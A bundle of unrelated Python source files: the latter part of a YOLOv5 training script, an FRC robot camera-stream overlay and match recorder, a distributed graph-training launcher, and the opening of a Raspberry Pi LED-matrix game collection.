'See Multi-GPU Tutorial at https://github.com/ultralytics/yolov5/issues/475 to get started.')
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and RANK != -1:
raise Exception('can not train with --sync-bn, known issue https://github.com/ultralytics/yolov5/issues/3998')
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
LOGGER.info('Using SyncBatchNorm()')
# Trainloader
train_loader, dataset = create_dataloader(train_path, imgsz, batch_size // WORLD_SIZE, gs, single_cls,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=RANK,
workers=workers, image_weights=opt.image_weights, quad=opt.quad,
prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(train_loader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, data, nc - 1)
# Process 0
if RANK in [-1, 0]:
val_loader = create_dataloader(val_path, imgsz, batch_size // WORLD_SIZE * 2, gs, single_cls,
hyp=hyp, cache=opt.cache_images and not noval, rect=True, rank=-1,
workers=workers, pad=0.5,
prefix=colorstr('val: '))[0]
if not resume:
labels = np.concatenate(dataset.labels, 0)
# c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and RANK != -1:
model = DDP(model, device_ids=[LOCAL_RANK], output_device=LOCAL_RANK)
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
last_opt_step = -1
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
LOGGER.info(f'Image sizes {imgsz} train, {imgsz} val\n'
f'Using {train_loader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if RANK in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if RANK != -1:
indices = (torch.tensor(dataset.indices) if RANK == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if RANK != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if RANK != -1:
train_loader.sampler.set_epoch(epoch)
pbar = enumerate(train_loader)
LOGGER.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if RANK in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if RANK != -1:
loss *= WORLD_SIZE # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni - last_opt_step >= accumulate:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
last_opt_step = ni
# Print
if RANK in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
f'{epoch}/{epochs - 1}', mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if loggers['tb'] and ni == 0: # TensorBoard
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
loggers['tb'].add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
elif plots and ni == 10 and loggers['wandb']:
wandb_logger.log({'Mosaics': [loggers['wandb'].Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for loggers
scheduler.step()
# DDP process 0 or single-GPU
if RANK in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not noval or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, _ = val.run(data_dict,
batch_size=batch_size // WORLD_SIZE * 2,
imgsz=imgsz,
model=ema.ema,
single_cls=single_cls,
dataloader=val_loader,
save_dir=save_dir,
save_json=is_coco and final_epoch,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if loggers['tb']:
loggers['tb'].add_scalar(tag, x, epoch) # TensorBoard
if loggers['wandb']:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not nosave) or (final_epoch and not evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(de_parallel(model)).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if loggers['wandb'] else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if loggers['wandb']:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training -----------------------------------------------------------------------------------------------------
if RANK in [-1, 0]:
LOGGER.info(f'{epoch - start_epoch + 1} epochs completed in {(time.time() - t0) / 3600:.3f} hours.\n')
if plots:
plot_results(save_dir=save_dir) # save as results.png
if loggers['wandb']:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [loggers['wandb'].Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
if not evolve:
if is_coco: # COCO dataset
for m in [last, best] if best.exists() else [last]: # speed, mAP tests
results, _, _ = val.run(data_dict,
batch_size=batch_size // WORLD_SIZE * 2,
imgsz=imgsz,
model=attempt_load(m, device).half(),
single_cls=single_cls,
dataloader=val_loader,
save_dir=save_dir,
save_json=True,
plots=False)
# Strip optimizers
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if loggers['wandb']: # Log the stripped model
loggers['wandb'].log_artifact(str(best if best.exists() else last), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
wandb_logger.finish_run()
torch.cuda.empty_cache()
return results
def parse_opt(known=False):
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyps/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='train, val image size (pixels)')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--noval', action='store_true', help='only validate final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', type=int, nargs='?', const=300, help='evolve hyperparameters for x generations')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
opt = parser.parse_known_args()[0] if known else parser.parse_args()
return opt
def main(opt):
set_logging(RANK)
if RANK in [-1, 0]:
print(colorstr('train: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_git_status()
check_requirements(exclude=['thop'])
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.safe_load(f)) # replace
opt.cfg, opt.weights, opt.resume = '', ckpt, True # reinstate
LOGGER.info(f'Resuming training from {ckpt}')
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = str(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok or opt.evolve))
# DDP mode
device = select_device(opt.device, batch_size=opt.batch_size)
if LOCAL_RANK != -1:
from datetime import timedelta
assert torch.cuda.device_count() > LOCAL_RANK, 'insufficient CUDA devices for DDP command'
torch.cuda.set_device(LOCAL_RANK)
device = torch.device('cuda', LOCAL_RANK)
dist.init_process_group(backend="nccl" if dist.is_nccl_available() else "gloo", timeout=timedelta(seconds=60))
assert opt.batch_size % WORLD_SIZE == 0, '--batch-size must be multiple of CUDA device count'
assert not opt.image_weights, '--image-weights argument is not compatible with DDP training'
# Train
if not opt.evolve:
train(opt.hyp, opt, device)
if WORLD_SIZE > 1 and RANK == 0:
_ = [print('Destroying process group... ', end=''), dist.destroy_process_group(), print('Done.')]
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mixup (probability)
'mixup': (1, 0.0, 1.0), # image mixup (probability)
'copy_paste': (1, 0.0, 1.0)} # segment copy-paste (probability)
with open(opt.hyp) as f:
hyp = yaml.safe_load(f) # load hyps dict
if 'anchors' not in hyp: # anchors commented in hyp.yaml
hyp['anchors'] = 3
assert LOCAL_RANK == -1, 'DDP mode not implemented for --evolve'
opt.noval, opt.nosave = True, True # only val/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system(f'gsutil cp gs://{opt.bucket}/evolve.txt .') # download evolve.txt if exists
for _ in range(opt.evolve): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() + 1E-6 # weights (sum > 0)
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
def run(**kwargs):
# Usage: import train; train.run(imgsz=320, weights='yolov5m.pt')
opt = parse_opt(True)
for k, v in kwargs.items():
setattr(opt, k, v)
main(opt)
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
CameraStream.py | import os
import cv2
import urllib.request
import numpy as np
from networktables import NetworkTables
import time
from collections import deque
from threading import Thread
from queue import Queue
""" This code was written very roughly and quickly to try and improve camera
latency by running all stream manipulations on the Driver Station and not on
the roboRIO. It does indeed help!
Also, it records all match video streams and saves them on the Driver Station.
Please notice that for the reasons described above, this code contains some bugs
and is not completely stable, so it is highly recommended to learn it and then
rewrite parts of it. """
MATCH_TYPE = {0: 'NA', 1: 'PM', 2: 'QM', 3: 'EM'}
class MatchRecorder:
def __init__(self, fps, timeout=1.0):
self.timeout = timeout
self.fps = fps
self.thread = None
self.stopped = False
self.queue = None
self.last_prefix = ""
self.capture_index = 0
def start(self, output_path, fourcc, fps, frame):
self.running = True
self.queue = Queue()
os.makedirs("captures", exist_ok=True)
self.writer = cv2.VideoWriter(
output_path, fourcc, fps, (frame.shape[1], frame.shape[0]))
self.thread = Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
self.last_time = time.time()
return self
def run(self):
while self.running:
if not self.queue.empty():
frame = self.queue.get()
self.writer.write(frame)
else:
time.sleep(self.timeout)
def update(self, frame, is_match):
if not self.running and is_match:
match_type = table.getNumber('FMSInfo/MatchType', 0)
match_number = table.getNumber('FMSInfo/MatchNumber', 0)
replay_number = table.getNumber('FMSInfo/ReplayNumber', 0)
prefix = "{}{}-{}".format(MATCH_TYPE[match_type],
match_number, replay_number)
if prefix != self.last_prefix:
self.capture_index = 0
self.last_prefix = prefix
path = "captures/{}_{}.avi".format(prefix, self.capture_index)
self.start(
path,
cv2.VideoWriter_fourcc(
'M',
'J',
'P',
'G'),
self.fps,
frame)
self.capture_index += 1
if self.running and not is_match:
self.finish()
if self.running and time.time() - self.last_time >= 1. / self.fps:
self.queue.put(frame)
self.last_time = time.time()
def flush(self):
while not self.queue.empty():
frame = self.queue.get()
self.writer.write(frame)
def finish(self):
self.running = False
self.thread.join()
self.flush()
self.writer.release()
class VideoStream:
def __init__(self, path, max_delta=1.0):
self.cap = cv2.VideoCapture(path)
(self.grabbed, self.frame) = self.cap.read()
self.max_delta = max_delta
self.start_time = 0
def start(self):
self.running = True
Thread(target=self.run, args=()).start()
return self
def run(self):
while self.running:
self.start_time = time.time()
(self.grabbed, self.frame) = self.cap.read()
def read(self):
flag = time.time() - self.start_time > self.max_delta and self.max_delta > 0
return self.frame, flag
def stop(self):
self.stopped = True
# ---------- MAIN CODE ----------
WINDOW_NAME = '3339 Camera Feed'
WINDOW_WIDTH = 320 * 2
WINDOW_HEIGHT = 240 * 2
SCREEN_WIDTH = 320
SCREEN_HEIGHT = 240
# ARROW PARAMS
ARROW_LENGTH = 40 # in pixels
PRINT_DISTANCE_FROM_SIDE = 20 # in pixels
PRINT_DISTANCE_FROM_TOP = 10 # in pixels
LEFT_ARROW_TOP = (PRINT_DISTANCE_FROM_SIDE, PRINT_DISTANCE_FROM_TOP)
LEFT_ARROW_DOWN = (
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP +
ARROW_LENGTH)
RIGHT_ARROW_TOP = (
SCREEN_WIDTH -
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP)
RIGHT_ARROW_DOWN = (
SCREEN_WIDTH -
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP +
ARROW_LENGTH)
ARROW_THICKNESS = 4
FORWARD_COLOR = (0, 255, 0)
BACKWARD_COLOR = (0, 0, 255)
# GEAR PARAMS
LEFT_GEAR_POINT = (
PRINT_DISTANCE_FROM_SIDE -
15,
SCREEN_HEIGHT -
PRINT_DISTANCE_FROM_TOP)
GEAR_THICKNESS = 4
POWER_COLOR = (210, 44, 44)
SPEED_COLOR = (239, 10, 247)
STRAM_PORT = "5810"
STREAM_IP = "10.33.39.2"
print('Connecting to network tables...')
NetworkTables.initialize(STREAM_IP) # router
# NetworkTables.initialize('169.254.223.10') #roborio
table = NetworkTables.getTable('SmartDashboard')
print('Connected to network tables...')
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)
cv2.resizeWindow(WINDOW_NAME, WINDOW_WIDTH, WINDOW_HEIGHT)
STREAM_ADDRESS = 'http://' + STREAM_IP + ':' + STRAM_PORT + '/stream.mjpg'
print('Connecting to camera stream..')
stream = VideoStream(STREAM_ADDRESS).start()
print('Connected to camera stream.')
fps = 0
FRAME_SAMPLE = 5
last_time = time.time()
last_frame = 0
# Capture
CAPTURE_FPS = 15
try:
recorder = MatchRecorder(CAPTURE_FPS)
except Exception as e:
print(e)
table.putBoolean('RecordKeyEvent', False)
while True:
frame, flag = stream.read()
direction = table.getString('Game/Direction', 'FORWARD')
gear = table.getString('Game/Gear', 'SPEED_GEAR')
if direction == 'BACKWARD':
# frame = cv2.flip(frame, 0)
cv2.arrowedLine(
frame,
LEFT_ARROW_TOP,
LEFT_ARROW_DOWN,
BACKWARD_COLOR,
ARROW_THICKNESS)
cv2.arrowedLine(
frame,
RIGHT_ARROW_TOP,
RIGHT_ARROW_DOWN,
BACKWARD_COLOR,
ARROW_THICKNESS)
elif direction == 'FORWARD':
frame = cv2.flip(frame, -1)
cv2.arrowedLine(
frame,
LEFT_ARROW_DOWN,
LEFT_ARROW_TOP,
FORWARD_COLOR,
ARROW_THICKNESS)
cv2.arrowedLine(
frame,
RIGHT_ARROW_DOWN,
RIGHT_ARROW_TOP,
FORWARD_COLOR,
ARROW_THICKNESS)
if gear == 'SPEED_GEAR':
cv2.putText(
frame,
'S',
LEFT_GEAR_POINT,
cv2.FONT_HERSHEY_SIMPLEX,
1.690,
SPEED_COLOR,
GEAR_THICKNESS)
elif gear == 'POWER_GEAR':
cv2.putText(
frame,
'P',
LEFT_GEAR_POINT,
cv2.FONT_HERSHEY_SIMPLEX,
1.690,
POWER_COLOR,
GEAR_THICKNESS)
# Calculate FPS
current_frame = stream.cap.get(cv2.CAP_PROP_POS_FRAMES)
if current_frame - last_frame >= FRAME_SAMPLE:
current_time = time.time()
fps = (current_frame - last_frame) / (current_time - last_time)
last_time = current_time
last_frame = current_frame
cv2.putText(frame, str(round(fps, 2)), (285, 230),
cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255, 255, 255))
try:
cv2.imshow(WINDOW_NAME, frame)
except BaseException:
stream.stop()
stream = VideoStream(STREAM_ADDRESS).start()
try:
recorder.finish()
except Exception as e:
print(e)
if table.getBoolean('Recording/VisionEnabled', False):
cv2.circle(frame, (140, 10), 5, (0, 255, 0), -1)
else:
cv2.circle(frame, (140, 10), 5, (255, 255, 255), -1)
timestamp = table.getNumber('Recording/Timestamp', 0)
cv2.putText(frame, "{0:0=3d}".format(int(timestamp)),
(155, 14), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255))
try:
recorder.update(frame, table.getBoolean('Recording/IsMatch', True))
except Exception as e:
print(e)
try:
recorder.finish()
except Exception as e:
print(e)
if cv2.waitKey(1) == 27:
exit(0)
|
main.py | from helper.parser import *
import random
import torch.multiprocessing as mp
from helper.utils import *
import train
import warnings
if __name__ == '__main__':
args = create_parser()
if args.fix_seed is False:
if args.parts_per_node < args.n_partitions:
warnings.warn('Please enable `--fix-seed` for multi-node training.')
args.seed = random.randint(0, 1 << 31)
if args.graph_name == '':
if args.inductive:
args.graph_name = '%s-%d-%s-%s-induc' % (args.dataset, args.n_partitions,
args.partition_method, args.partition_obj)
else:
args.graph_name = '%s-%d-%s-%s-trans' % (args.dataset, args.n_partitions,
args.partition_method, args.partition_obj)
if args.skip_partition:
if args.n_feat == 0 or args.n_class == 0 or args.n_train == 0:
warnings.warn('Specifying `--n-feat`, `--n-class` and `--n-train` saves data loading time.')
g, n_feat, n_class = load_data(args.dataset)
args.n_feat = n_feat
args.n_class = n_class
args.n_train = g.ndata['train_mask'].int().sum().item()
else:
g, n_feat, n_class = load_data(args.dataset)
if args.node_rank == 0:
if args.inductive:
graph_partition(g.subgraph(g.ndata['train_mask']), args)
else:
graph_partition(g, args)
args.n_class = n_class
args.n_feat = n_feat
args.n_train = g.ndata['train_mask'].int().sum().item()
print(args)
if args.backend == 'gloo':
processes = []
if 'CUDA_VISIBLE_DEVICES' in os.environ:
devices = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
else:
n = torch.cuda.device_count()
devices = [f'{i}' for i in range(n)]
mp.set_start_method('spawn', force=True)
start_id = args.node_rank * args.parts_per_node
for i in range(start_id, min(start_id + args.parts_per_node, args.n_partitions)):
os.environ['CUDA_VISIBLE_DEVICES'] = devices[i % len(devices)]
p = mp.Process(target=train.init_processes, args=(i, args.n_partitions, args))
p.start()
processes.append(p)
for p in processes:
p.join()
elif args.backend == 'nccl':
raise NotImplementedError
elif args.backend == 'mpi':
raise NotImplementedError
else:
raise ValueError
|
games_pi.py | # WS2812 LED Matrix Gamecontrol (Tetris, Snake, Pong)
# by M Oehler
# https://hackaday.io/project/11064-raspberry-pi-retro-gaming-led-display
# ported from
# Tetromino (a Tetris clone)
# By Al Sweigart al@inventwithpython.com
# http://inventwithpython.com/pygame
# Released under a "Simplified BSD" license
import random, time, sys, socket, threading, queue, socketserver, os
from PIL import Image # tested with pillow-6.2.1
# If Pi = False the script runs in simulation mode using pygame lib
PI = True
import pygame
from pygame.locals import *
from random import randint # random numbers
import datetime
if PI:
import serial
from luma.led_matrix.device import max7219
from luma.core.interface.serial import spi, noop
from luma.core.render import canvas
from luma.core.legacy.font import proportional, SINCLAIR_FONT, TINY_FONT, CP437_FONT
from luma.core.legacy import show_message, text
import asyncio
from evdev import InputDevice, categorize, ecodes # PS4 inputs
import evdev
from select import select
# only modify this two values for size adaption!
PIXEL_X=10
PIXEL_Y=20
#TODO implement MineSweeper?
MAX2719_DISPLAYS=4 # number of cascaded displays
MAX2719_ORIENTATION=90 # Corrects block orientation when wired vertically choices=[0, 90, -90]
MAX2719_ROTATION=0 # Rotate display 0=0°, 1=90°, 2=180°, 3=270° choices=[0, 1, 2, 3]
#PORT_NAME = "/dev/ttyAMA0"
PORT_NAME = "/dev/ttyS0"
SIZE= 20
FPS = 15
BOXSIZE = 20
WINDOWWIDTH = BOXSIZE * PIXEL_X
WINDOWHEIGHT = BOXSIZE * PIXEL_Y
BOARDWIDTH = PIXEL_X
BOARDHEIGHT = PIXEL_Y
BLANK = '.'
MOVESIDEWAYSFREQ = 0.15
MOVEDOWNFREQ = 0.15
FALLING_SPEED = 0.8
# R G B
WHITE = (255, 255, 255)
GRAY = (185, 185, 185)
BLACK = ( 0, 0, 0)
RED = (255, 0, 0)
LIGHTRED = (175, 20, 20)
GREEN = ( 0, 255, 0)
LIGHTGREEN = ( 20, 175, 20)
BLUE = ( 0, 0, 255)
LIGHTBLUE = ( 20, 20, 175)
YELLOW = (255, 255, 0)
LIGHTYELLOW = (175, 175, 20)
CYAN = ( 0, 255, 255)
MAGENTA = (255, 0, 255)
ORANGE = (255, 100, 0)
SCORES =(0,40,100,300,1200)
BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
